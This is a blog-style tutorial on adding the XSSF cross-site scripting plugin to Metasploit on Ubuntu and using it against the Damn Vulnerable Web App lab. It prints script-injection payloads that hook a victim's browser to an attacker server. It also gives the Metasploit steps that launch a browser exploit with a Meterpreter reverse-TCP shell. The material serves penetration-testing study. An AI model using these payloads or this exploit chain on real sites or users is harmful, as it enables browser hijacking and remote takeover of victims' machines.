Add XSSF to Metasploit Framework on Ubuntu
- What is XSSF or the Cross-site Scripting Framework?
The XSS Framework (XSSF) is able to manage victims of a generic XSS attack and hold an existing connection with JavaScript loop refreshing in order to allow future browser-based attacks. After injection of the generic attack (resource “loop” generated by XSSF), each victim will ask the attack server (every “x” seconds) if new commands are available:
The advantage of having the project built within the Metasploit Framework is the ability to run browser exploits already included in MSF. Unlike the existing projects (BeEF, XeeK, XSSShell/XSSTunnel), XSSF gives the possibility to simply add and run attacks (using MSF modules), and execute already existing MSF exploits without installing third-party solutions. MSF uses Ruby scripts to create a server listeners that wait for exploited browsers to connect. In addition, the ability to create XSS tunnels with targeted victims is a real advantage.
Video showing how XSSF works in MetaSploit
Video showing how XSSF Tunnel works
Setting up XSSF Framework for Metasploit on Ubuntu 10.10
Download http://www.metasploit.com/redmine/attachments/596/XSSF.zip
UNZIP and copy files into metasploit /msf3 directory
cp -iR /home/user/Downloads/XSSF/data/ <space> /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/lib/ <space> /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/modules/ <space> /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/plugins/ <space> /opt/metasploit3/msf3/RENAME XSSF.rb ruby script (it is wrong in zip file)
mv /opt/metasploit3/msf3/plugins/XSSF.rb <space> /opt/metasploit3/msf3/plugins/xssf.rb
INSTALL MySQL IF NOT ALREADY INSTALLED
Install MySQL with Synaptic or apt-get
$ sudo apt-get install mysql-server mysql-client
$ sudo apt-get install libmysql-ruby libmysqlclient-devFIX MySQL ERROR: The database backend has not been initialized …
gem install mysql
(needed for XSSF to use MySQL driver)
FIX RUBY ERRORS DURING START OF METASPLOIT (UPGRADE RUBY TO 1.9.1)
apt-get install ruby1.9.1-full
mv /usr/bin/ruby <space> ruby1.8_symlink
cp -s ruby1.9.1 <space> ruby (-s to create a symbolic link to ruby version 1.9.1)SET GEM VERSION TO 1.9.1
mv gem gem1.8_symlink
cp -s gem1.9.1 <space> gem (-s to create a symbolic link to gem version 1.9.1)NOW YOU NEED A SITE WITH XSS VULNERABILITY EXPLOIT:
Damn Vulnerable Web App LIVE CD
EXPLOIT: On DVWA as a Reflective or Stored Cross-site Scripting attack
http://server_ipaddress/?lang=”><script src=”http://xssf_ipaddress:8888/loop?interval=2″></script>
OR THIS INTO SUBMIT FIELD ON PAGE
“><script src=”http://xssf_ipaddres:8888/loop?interval=2″></script>you will see the victim page refresh every 2 secs
START METASPLOIT
$ /opt/metasploit3/msf3/msfconsole
msf> svn update (to get latest exploits, plugins, modules)
CONNECT METASPLOIT TO MYSQL DATABASE
msf> db_driver mysql
msf> db_connect user:pass@127.0.0.1:3306/msf3(use same pass as when you setup the mysql database above)
USING METASPLOIT (XSSF):
LOAD METASPLOIT XSSF AND TYPE
msf> load XSSF (case-sensitive)Please run ‘http://ipaddress:8888/loop’ into any browser with JavaScript enabled
msf> xssf_victims (note victim 1)
msf> xssf_information 1
msf> use auxiliary/xssf/alert
msf> set AlertMessage XSS pop-up will appear
msf> runUSING METASPLOIT XSSF AUXILLARY MODULES:
EXPLOIT BROWSER VIA XSSF WITH VULNERABILITY OF CHOICE
msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.82
msf> exploit
msf> jobs
msf> xssf_exploit 1 0
- See more at: http://securitystreetknowledge.com/?p=445#sthash.bADoO9wY.dpuf
